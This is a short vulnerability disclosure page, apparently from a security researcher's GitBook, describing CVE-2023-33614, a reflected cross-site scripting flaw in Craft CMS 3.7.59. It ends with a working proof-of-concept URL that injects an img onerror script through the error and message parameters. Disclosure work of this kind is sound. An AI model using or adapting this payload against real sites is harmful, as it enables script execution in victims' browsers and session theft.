CVE
  • Craft CMS
    • [CVE-2023-30177] Stored - Cross Site Script (XSS)
    • [CVE-2023-30178] Server-Side Template Injection
    • [CVE-2023-30179] Server-Side Template Injection
    • [CVE-2023-33614] Reflected - Cross Site Script (XSS)
  • [CVE-2023-33616] Server-side request forgery (SSRF)
Powered by GitBook
On this page
  1. Craft CMS

[CVE-2023-33614] Reflected - Cross Site Script (XSS)

Previous[CVE-2023-30179] Server-Side Template InjectionNext[CVE-2023-33616] Server-side request forgery (SSRF)

Last updated 1 year ago

Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services

Vendor of Product: CraftCMS

Affected Product Code Base: 3.7.59

CVE: CVE-2023-33614

Description: Craft CMS version 3.7.59 is vulnerable of XSS vulnerability, which allows remote unauthenticated attacker to execute javascript code via error and message parameter.

Steps to reproduce:

  • Send a URL to victim, when user clicked the link, XSS will be executed.

http://localhost/craftcms/web/admin/plugin-store/callback?error=error%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E&message=message%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E